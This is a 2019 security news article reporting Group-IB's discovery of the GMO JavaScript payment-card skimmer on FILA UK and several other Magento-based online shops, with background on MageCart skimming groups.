Among the websites actively leaking customers' sensitive data to an unauthorized third party is FILA UK, likely since November 2018, when it was compromised.
Thieving script active on multiple websites
It is estimated that at least 5,600 shoppers of FILA sportswear had their payment and personal details stolen by now. At the moment, every new customer of the website has the same fate.
- Jungle Lee home design shop
- Forshaw pest management products store
- Absolute New York cosmetics seller
- Safe Harbor Computers shop for video editing and animation computer gear
- Cajun Grocer online grocery store
The script was discovered early this month and dubbed GMO by Group-IB, a company that specializes in preventing cyber attacks. The name comes from 'gmo[.]li', a domain registered on May 7, 2018, the threat actor uses to exfiltrate the data. The researchers found the malware by automatically checking HTML code on a large number of websites.
Some possible methods to place the script on the victim website include exploiting a vulnerability in the Magento e-commerce platform used by the stores or by "compromising the credentials of the website administrator using special spyware or cracking password with brute force methods," says Dmitry Volkov, CTO and Head of Threat Intelligence at Group-IB.
The security outfit tried to alert the affected parties of the compromise, but none of them replied, despite several notifications.
"Group-IB reported about the possible breach to local authorities in the UK and US as well. As of March 14th, GMO sniffer has not been removed on all of these websites," a company representative told BleepingComputer.
Web skimmers and the groups behind them
Also known as a 'sniffer' or 'web skimmer,' the code is designed to capture payment card data on a checkout page; the package is then delivered to a server and collected by the cybercriminals.
The groups engaged in this type of card-scraping campaigns have been active since 2015, and are known by the name MageCart, given by security company RiskIQ. Some of the big-name victims are British Airways, TicketMaster, OXO, and Newegg.
RiskIQ distinguishes between at least 12 MageCart groups, each having different tech skills and running malware with various levels of sophistication.
"Since in some cases it is difficult to determine how many people use the sniffer, Group-IB experts call them families, not groups or threat actors," a company spokesperson told us, adding that there could be more than 30 different groups slinging this type of malware.
The GMO family of JS Sniffers was injected manually on the victim websites, which suggests a young actor, Group-IB told us, that has not appeared in previous reports and used only one domain so far.
This does not mean that it is also unknowledgeable because it relies on several techniques to hide the malicious activity.
In their research, Group-IB found 38 distinct families of JS Sniffers. The company says that researchers are working on a report that analyzes the activity of 15 groups, nine of them being new on the public scene.
|Date added||March 15, 2019, 9:36 a.m.|